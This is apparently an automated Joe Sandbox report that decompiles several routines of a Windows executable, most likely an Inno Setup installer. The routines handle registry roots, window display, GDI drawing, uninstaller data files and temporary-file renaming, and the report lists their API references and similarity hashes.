								_push(0x45c520);
								_push(_t57);
								E00403634();
								SetLastError(E0045C238(_a4 & 0xffffff00 | _t35 == 0x00000002, _t35, _v8, 4, _t55, _t57, 2, _a4, _a8));
							} else {
								SetLastError(0x57);
							}
						}
					}
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x45c4bb);
				return E00403400( &_v8);
			}

0x0045c3e8
0x0045c3eb
0x0045c3ed
0x0045c3ee
0x0045c3ef
0x0045c3f0
0x0045c3f2
0x0045c3f6
0x0045c3f7
0x0045c3fc
0x0045c3ff
0x0045c402
0x0045c408
0x0045c41d
0x00000000
0x0045c40a
0x0045c40a
0x0045c40b
0x0045c42c
0x00000000
0x0045c40d
0x0045c40d
0x0045c40e
0x0045c43b
0x00000000
0x0045c410
0x0045c411
0x0045c44a
0x0045c45c
0x0045c45c
0x0045c45f
0x0045c464
0x0045c46d
0x0045c492
0x0045c413
0x0045c453
0x0045c458
0x0045c411
0x0045c40e
0x0045c40b
0x0045c4a0
0x0045c4a3
0x0045c4a6
0x0045c4b3

APIs

SetLastError.KERNEL32(00000057,00000000,0045C4B4,?,?,?,?,00000000), ref: 0045C453
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C520,?,00000000,0045C4B4,?,?,?,?,00000000), ref: 0045C492

Strings

CLASSES_ROOT, xrefs: 0045C418
CURRENT_USER, xrefs: 0045C427
USERS, xrefs: 0045C445
MACHINE, xrefs: 0045C436

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: 769a95a04c3cab330e4d6e90b3a7104ca163033451f3160f6ddc02e8bbf0b10e
Instruction ID: 7980c35c9e830c342080bd626fcf40887ced656d0f190447a49c1bd9b9b8492d
Opcode Fuzzy Hash: 769a95a04c3cab330e4d6e90b3a7104ca163033451f3160f6ddc02e8bbf0b10e
Instruction Fuzzy Hash: 0911D830204308BFDB11DE95C9E1FBE76ACD789306F6080776D0066283E67C5F0A956A

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD74 Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041BD74(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v30;
				int _v40;
				int _v44;
				signed short _v48;
				int _t28;
				signed int _t29;
				signed short _t30;
				signed int _t31;
				signed short _t35;
				intOrPtr _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				intOrPtr _t55;

				_t53 = _t54;
				_t55 = _t54 + 0xffffff8c;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v24 = _v16 << 4;
				_v20 = E004069BC(_v24, __edx, __edi, __eflags);
				 *[fs:0x0] = _t55;
				 *((intOrPtr*)( *_v8))( *[fs:0x0], 0x41c020, _t53, __edi, __esi, __ebx, _t52);
				_v44 = GetSystemMetrics(0xb);
				_t28 = GetSystemMetrics(0xc);
				_v40 = _t28;
				_push(0);
				L00405F14();
				_v48 = _t28;
				if(_v48 == 0) {
					E0041B37C();
				}
				_push(_t53);
				_push(0x41be44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t55;
				_push(0xe);
				_t29 = _v48;
				_push(_t29);
				L00405C44();
				_push(0xc);
				_t30 = _v48;
				_push(_t30);
				L00405C44();
				_t31 = _t29 * _t30;
				if(_t31 != 0x18) {
					__eflags = 1;
					_v30 = 1 << _t31;
				} else {
					_v30 = 0;
				}
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0041BE4B);
				_t35 = _v48;
				_push(_t35);
				_push(0);
				L004060FC();
				return _t35;
			}

0x0041bd75
0x0041bd77
0x0041bd7d
0x0041bd80
0x0041bd83
0x0041bd8c
0x0041bd97
0x0041bda7
0x0041bdb9
0x0041bdc2
0x0041bdc7
0x0041bdcc
0x0041bdcf
0x0041bdd1
0x0041bdd6
0x0041bddd
0x0041bddf
0x0041bddf
0x0041bde6
0x0041bde7
0x0041bdec
0x0041bdef
0x0041bdf2
0x0041bdf4
0x0041bdf7
0x0041bdf8
0x0041bdff
0x0041be01
0x0041be04
0x0041be05
0x0041be0e
0x0041be14
0x0041be24
0x0041be27
0x0041be16
0x0041be16
0x0041be16
0x0041be2d
0x0041be30
0x0041be33
0x0041be38
0x0041be3b
0x0041be3c
0x0041be3e
0x0041be43

APIs

GetSystemMetrics.USER32 ref: 0041BDBD
GetSystemMetrics.USER32 ref: 0041BDC7
740BAC50.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDD1
740BAD70.GDI32(00000000,0000000E,00000000,0041BE44,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF8
740BAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE44,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE05
740BB380.USER32(00000000,00000000,0041BE4B,0000000E,00000000,0041BE44,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE3E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MetricsSystem$B380
String ID:
API String ID: 3145338429-0
Opcode ID: 0df12c8d62bb939400ca0da0d7898a429962746ff966cd16a11938031c817c34
Instruction ID: 6ac2cf66a2cb7e3e475dd524f6c78ba3bd0a364a30d5c052a6fa0d279a6d40ba
Opcode Fuzzy Hash: 0df12c8d62bb939400ca0da0d7898a429962746ff966cd16a11938031c817c34
Instruction Fuzzy Hash: 1A212874E00649AFEB10EFA9C882BEEB7B4EB48714F10802AF514B7780D7795940CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0047C854 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047C854(void* __eax) {
				intOrPtr _t12;
				signed int _t15;
				intOrPtr _t16;
				intOrPtr _t19;
				signed int _t21;
				long _t22;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				void* _t32;

				_t32 = __eax;
				_t12 =  *0x49a628; // 0x2262410
				_t15 = GetWindowLongA( *(_t12 + 0x20), 0xffffffec) & 0xffffff00 | (_t14 & 0x00000080) == 0x00000000;
				if(_t32 != _t15) {
					_t16 =  *0x49a628; // 0x2262410
					SetWindowPos( *(_t16 + 0x20), 0, 0, 0, 0, 0, 0x97);
					_t19 =  *0x49a628; // 0x2262410
					_t21 = GetWindowLongA( *(_t19 + 0x20), 0xffffffec);
					if(_t32 == 0) {
						_t22 = _t21 | 0x00000080;
					} else {
						_t22 = _t21 & 0xffffff7f;
					}
					_t23 =  *0x49a628; // 0x2262410
					SetWindowLongA( *(_t23 + 0x20), 0xffffffec, _t22);
					if(_t32 == 0) {
						_t26 =  *0x49a628; // 0x2262410
						return SetWindowPos( *(_t26 + 0x20), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t29 =  *0x49a628; // 0x2262410
						return ShowWindow( *(_t29 + 0x20), 5);
					}
				}
				return _t15;
			}

0x0047c855
0x0047c859
0x0047c869
0x0047c86e
0x0047c87f
0x0047c888
0x0047c88f
0x0047c898
0x0047c89f
0x0047c8a8
0x0047c8a1
0x0047c8a1
0x0047c8a1
0x0047c8b0
0x0047c8b9
0x0047c8c0
0x0047c8e0
0x00000000
0x0047c8c2
0x0047c8c4
0x00000000
0x0047c8cd
0x0047c8c0
0x0047c8ef

APIs

GetWindowLongA.USER32 ref: 0047C862
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046B9FC), ref: 0047C888
GetWindowLongA.USER32 ref: 0047C898
SetWindowLongA.USER32 ref: 0047C8B9
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047C8CD
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047C8E9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: 8c70efdb4814a6ff2c3b7a8bd3aab8f7602cd57d1f979745abfa1706a0c2e60c
Instruction ID: a0480a7355ec7c351c557c8ac51ba8c1a6d938bc9602d29c2a7bb312f8a5b3e0
Opcode Fuzzy Hash: 8c70efdb4814a6ff2c3b7a8bd3aab8f7602cd57d1f979745abfa1706a0c2e60c
Instruction Fuzzy Hash: 63011EB5651310ABD700E768CD81F663798AB0D338F0A027AB999DF3E2C639DC109B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B258 Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B258(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041A6C8( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041A6C8( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041A744( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041A040(E0041A68C( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041A040(E0041A68C( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x0041b259
0x0041b264
0x0041b276
0x0041b285
0x0041b2bf
0x0041b2d0
0x0041b287
0x0041b299
0x0041b2aa
0x0041b2aa

APIs

Part of subcall function 0041A6C8: CreateBrushIndirect.GDI32 ref: 0041A733

UnrealizeObject.GDI32(00000000), ref: 0041B264
SelectObject.GDI32(?,00000000), ref: 0041B276
SetBkColor.GDI32(?,00000000), ref: 0041B299
SetBkMode.GDI32(?,00000002), ref: 0041B2A4
SetBkColor.GDI32(?,00000000), ref: 0041B2BF
SetBkMode.GDI32(?,00000001), ref: 0041B2CA

Part of subcall function 0041A040: GetSysColor.USER32(?), ref: 0041A04A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 119d1b42e4442e97da8ea338fe5b39c5348f28ab57e5b049b79d1ef89492a8b8
Instruction ID: 43bdc70ad03e216046bf5eb3befce14516e6141ecec4e97f80abccfc171ef350
Opcode Fuzzy Hash: 119d1b42e4442e97da8ea338fe5b39c5348f28ab57e5b049b79d1ef89492a8b8
Instruction Fuzzy Hash: 97F0BFB1151500ABCF00FFBAD9CAE4B27ACAF443097048457B544DF19BC53CD8504B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00496058 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00496058(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t39;
				intOrPtr _t43;
				intOrPtr _t56;
				intOrPtr _t61;
				intOrPtr _t87;
				void* _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t95;

				_t95 = __eflags;
				_t90 = __esi;
				_t89 = __edi;
				_t63 = __ebx;
				_t92 = _t93;
				_t94 = _t93 + 0xffffffe8;
				_v20 = 0;
				 *[fs:eax] = _t94;
				_t24 =  *0x49a628; // 0x2262410
				E004242AC(_t24, "Uninstall", __edi);
				_t26 =  *0x49a628; // 0x2262410
				ShowWindow( *(_t26 + 0x20), 5);
				 *[fs:edx] = _t94;
				E0047D408();
				E0042D868( &_v20);
				E00407288(_v20);
				E0042D3F0(0, __ebx,  &_v20, __edi, __esi);
				E00403450(0x49b450, __ebx, _v20, _t89, __esi);
				E004948D8(_t63, _t89, _t90, _t95);
				_t39 =  *0x49b450; // 0x0
				E0042C49C(_t39, _t63,  &_v20, 0x4962e8, _t89, _t90, _t95);
				E00403450(0x49b454, _t63, _v20, _t89, _t90);
				_t43 =  *0x49b450; // 0x0
				E0042C49C(_t43, _t63,  &_v20, 0x4962f8, _t89, _t90, _t95);
				E00403450(0x49b458, _t63, _v20, _t89, _t90);
				_v8 = E0044FA8C(1, 1, 0, 2);
				 *[fs:eax] = _t94;
				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x4961a0, _t92,  *[fs:edx], 0x496289, _t92,  *[fs:eax], 0x4962bd, _t92, __edi, __esi, __ebx, _t91);
				E0044FA50(_v8, _v28 - 8);
				E0044FA28(_v8, 8,  &_v16);
				if(_v16 == 0x67734d49) {
					_t56 =  *0x49b450; // 0x0
					E00450910(_t56, _t63, 1, _v12, _t89, _t90);
				} else {
					_t61 =  *0x49b458; // 0x0
					E00450910(_t61, _t63, 1, 0, _t89, _t90);
				}
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E004961A7);
				return E00402B58(_v8);
			}

0x00496058
0x00496058
0x00496058
0x00496058
0x00496059
0x0049605b
0x00496063
0x00496071
0x00496079
0x0049607e
0x00496085
0x0049608e
0x0049609e
0x004960a1
0x004960a9
0x004960b1
0x004960bb
0x004960c8
0x004960cd
0x004960da
0x004960df
0x004960ec
0x004960f9
0x004960fe
0x0049610b
0x00496128
0x00496136
0x00496141
0x0049614d
0x0049615d
0x00496169
0x00496180
0x00496185
0x0049616b
0x0049616f
0x00496174
0x00496174
0x0049618c
0x0049618f
0x00496192
0x0049619f

APIs

Part of subcall function 004242AC: SetWindowTextA.USER32(?,00000000), ref: 004242C4

ShowWindow.USER32(?,00000005,00000000,004962BD,?,?,00000000), ref: 0049608E

Part of subcall function 0042D868: GetSystemDirectoryA.KERNEL32 ref: 0042D87B

Part of subcall function 00407288: SetCurrentDirectoryA.KERNEL32(00000000,?,004960B6,00000000,00496289,?,?,00000005,00000000,004962BD,?,?,00000000), ref: 00407293

Part of subcall function 0042D3F0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D47E,?,?,?,00000001,?,004551E6,00000000,0045524E), ref: 0042D425

Strings

Uninstall, xrefs: 00496074
IMsg, xrefs: 00496162
.msg, xrefs: 004960F4
.dat, xrefs: 004960D5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 98951bc155f0608bb744c29c03173cf31201980e52192acc6f6e8f643d3a950d
Instruction ID: 4d5ad50552d6dad07fa801569c23eaecf2cc15b5db61348b0cbea2f80843ebcf
Opcode Fuzzy Hash: 98951bc155f0608bb744c29c03173cf31201980e52192acc6f6e8f643d3a950d
Instruction Fuzzy Hash: 1D31B334A006189FDB00FF65DD5295E7B75FB45708F51887AF800A7392CB79AD01DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0049650C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0049650C(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				CHAR* _t42;
				char _t55;
				intOrPtr _t65;
				void* _t69;
				signed int _t71;
				void* _t75;

				_v24 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t75);
				_push(0x496602);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75 + 0xffffffe4;
				E00403400(_v12);
				E0042C8F8(_v8, 0,  &_v16);
				_t69 = 0;
				_t55 = 0;
				do {
					_t9 =  &_v24; // 0x496e5c
					_v32 = _t55;
					_v28 = 0;
					E004078D4("isRS-%.3u.tmp", 0,  &_v32, _t9);
					_t13 =  &_v24; // 0x496e5c
					E004035C0( &_v20,  *_t13, _v16);
					_t71 = GetFileAttributesA(E00403738(_v20));
					if(_t71 == 0xffffffff) {
						L5:
						_t42 = E00403738(_v20);
						if(MoveFileExA(E00403738(_v8), _t42, 1) == 0) {
							_t69 = _t69 + 1;
							if(_t69 == 0xa) {
								break;
							}
							goto L8;
						}
						E00403494(_v12, _v20);
						break;
					}
					if((_t71 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t71 & 0x00000001) != 0) {
						SetFileAttributesA(E00403738(_v20), _t71 & 0xfffffffe);
					}
					goto L5;
					L8:
					_t55 = _t55 + 1;
				} while (_t55 != 0x3e8);
				_pop(_t65);
				 *[fs:eax] = _t65;
				_push(E00496609);
				_t26 =  &_v24; // 0x496e5c
				return E00403420(_t26, 3);
			}

0x00496517
0x0049651a
0x0049651d
0x00496520
0x00496523
0x00496528
0x00496529
0x0049652e
0x00496531
0x00496537
0x00496542
0x00496547
0x00496549
0x0049654b
0x0049654b
0x0049654f
0x00496552
0x00496560
0x00496565
0x0049656e
0x00496581
0x00496586
0x004965aa
0x004965af
0x004965c5
0x004965d4
0x004965d8
0x00000000
0x00000000
0x00000000
0x004965d8
0x004965cd
0x00000000
0x004965cd
0x0049658e
0x00000000
0x00000000
0x00496596
0x004965a5
0x004965a5
0x00000000
0x004965da
0x004965da
0x004965db
0x004965e9
0x004965ec
0x004965ef
0x004965f4
0x00496601

APIs

GetFileAttributesA.KERNEL32(00000000,\nI,00000000,00496602,?,?,00000000,0049A628), ref: 0049657C
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,\nI,00000000,00496602,?,?,00000000,0049A628), ref: 004965A5
MoveFileExA.KERNEL32 ref: 004965BE

Strings

isRS-%.3u.tmp, xrefs: 0049655B
\nI, xrefs: 0049654B, 00496565, 004965F4, 0049654E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$Attributes$Move
String ID: \nI$isRS-%.3u.tmp
API String ID: 3839737484-2987684456
Opcode ID: 413ab9fc767c7a51b9a72645ccfa49b307e3c54237f676e15679f6957bd32fc5
Instruction ID: 563d2e76b9e5a21ffbe4f6293c68080067c427bcface4cd0eb650ccff7f3f32d
Opcode Fuzzy Hash: 413ab9fc767c7a51b9a72645ccfa49b307e3c54237f676e15679f6957bd32fc5
Instruction Fuzzy Hash: 29216171E04219ABCF01EFA9D8819AFBBB8EF44314F52453BB814B72D1D6389E018A59

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8F4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0042E8F4(void* __eax, void* __edx, intOrPtr _a4080) {
				short _v4108;
				void* _t6;
				signed int _t12;
				int _t15;
				signed int _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_push(__eax);
				_t6 = 2;
				do {
					_t25 = _t25 + 0xfffff004;
					_push(_t6);
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				_t26 = _t25 + 4;
				_t23 = __edx;
				_t24 = _a4080;
				E0042E9A0(_t24);
				_t21 = GetProcAddress(GetModuleHandleA("user32.dll"), "ShutdownBlockReasonCreate");
				if(_t21 == 0) {
					_t12 = 0;
				} else {
					_t15 = E00403574(_t23);
					 *((short*)(_t26 + MultiByteToWideChar(0, 0, E00403738(_t23), _t15,  &_v4108, 0xfff) * 2)) = 0;
					_t19 =  *_t21(_t24, _t26);
					asm("sbb eax, eax");
					_t12 =  ~( ~_t19);
				}
				return _t12;
			}

0x0042e8f7
0x0042e8f8
0x0042e8fd
0x0042e8fd
0x0042e903
0x0042e904
0x0042e904
0x0042e90e
0x0042e911
0x0042e913
0x0042e917
0x0042e931
0x0042e935
0x0042e96c
0x0042e937
0x0042e943
0x0042e95a
0x0042e962
0x0042e966
0x0042e968
0x0042e968
0x0042e977

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E926
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E92C
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E955

Strings

user32.dll, xrefs: 0042E921
ShutdownBlockReasonCreate, xrefs: 0042E91C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: 083bd73b3a57b2c737c687ad4ea0f6b7ff9c77bc07e98a1005f031f642bdcf7d
Instruction ID: c1538ad6e73312534a36969f76a12c14ace08a3a82fdd452fed24f65bcb55ef8
Opcode Fuzzy Hash: 083bd73b3a57b2c737c687ad4ea0f6b7ff9c77bc07e98a1005f031f642bdcf7d
Instruction Fuzzy Hash: 00F0C2E134062276E660B2BFACC2F7F148C8F94725F540137B108EA2C2E96C8905426F

Uniqueness

Uniqueness Score: -1.00%

Function 004531B2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004531B2(void* __edx) {
				CHAR* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t38;

				_t27 = E00403738( *((intOrPtr*)(_t38 - 0x10)));
				SetFileAttributesA(_t27, 0x20);
				if(E00406F30( *((intOrPtr*)(_t38 - 0x10))) == 0) {
					E004527FC("DeleteFile");
				}
				if(MoveFileA(E00403738( *((intOrPtr*)(_t38 - 0x14))), _t27) == 0) {
					E004527FC("MoveFile");
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_pop(_t34);
				 *[fs:eax] = _t34;
				_push(E004532A9);
				E00403420(_t38 - 0x30, 2);
				E00403420(_t38 - 0x24, 2);
				_t6 = _t38 - 0x14; // 0x496e5c
				return E00403420(_t6, 5);
			}

0x004531bc
0x004531bf
0x004531ce
0x004531d5
0x004531d5
0x004531eb
0x004531f2
0x004531f2
0x004531f9
0x004531fc
0x0045326f
0x00453272
0x00453275
0x00453282
0x0045328f
0x00453294
0x004532a1

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004531BF

Part of subcall function 00406F30: DeleteFileA.KERNEL32(00000000,0049A628,004969ED,00000000,00496A42,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F3B

MoveFileA.KERNEL32 ref: 004531E4

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

Strings

MoveFile, xrefs: 004531ED
DeleteFile, xrefs: 004531D0
\nI, xrefs: 00453294

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: DeleteFile$MoveFile$\nI
API String ID: 3024442154-1067230999
Opcode ID: cc47a826d7efd1ea3f9ffd317128a1392085815d1dd83a257d182154f6b65472
Instruction ID: 291e0caee6beb33f6ae25bb805f8f1650d7dc6c3cf4698b78b7b56a94a9abe8b
Opcode Fuzzy Hash: cc47a826d7efd1ea3f9ffd317128a1392085815d1dd83a257d182154f6b65472
Instruction Fuzzy Hash: 7EF062702146445BEB00EFA6D94266E67ECEB4434BF60443BF800B7683DA3C9E094929

Uniqueness

Uniqueness Score: -1.00%

Function 0042E7F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042E7F8(long __eax) {
				long _t1;
				long _t5;

				_t1 = __eax;
				_t5 = __eax;
				if( *0x49a660 == 0) {
					 *0x49a664 = GetProcAddress(GetModuleHandleA("user32.dll"), "ChangeWindowMessageFilter");
					_t1 = InterlockedExchange(0x49a660, 1);
				}
				if( *0x49a664 != 0) {
					return  *0x49a664(_t5, 1);
				}
				return _t1;
			}

0x0042e7f8
0x0042e7f9
0x0042e802
0x0042e819
0x0042e825
0x0042e825
0x0042e831
0x00000000
0x0042e836
0x0042e83d

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8BC,00000004,00498934,00456035,004563D8,00455F8C,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E80E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E814
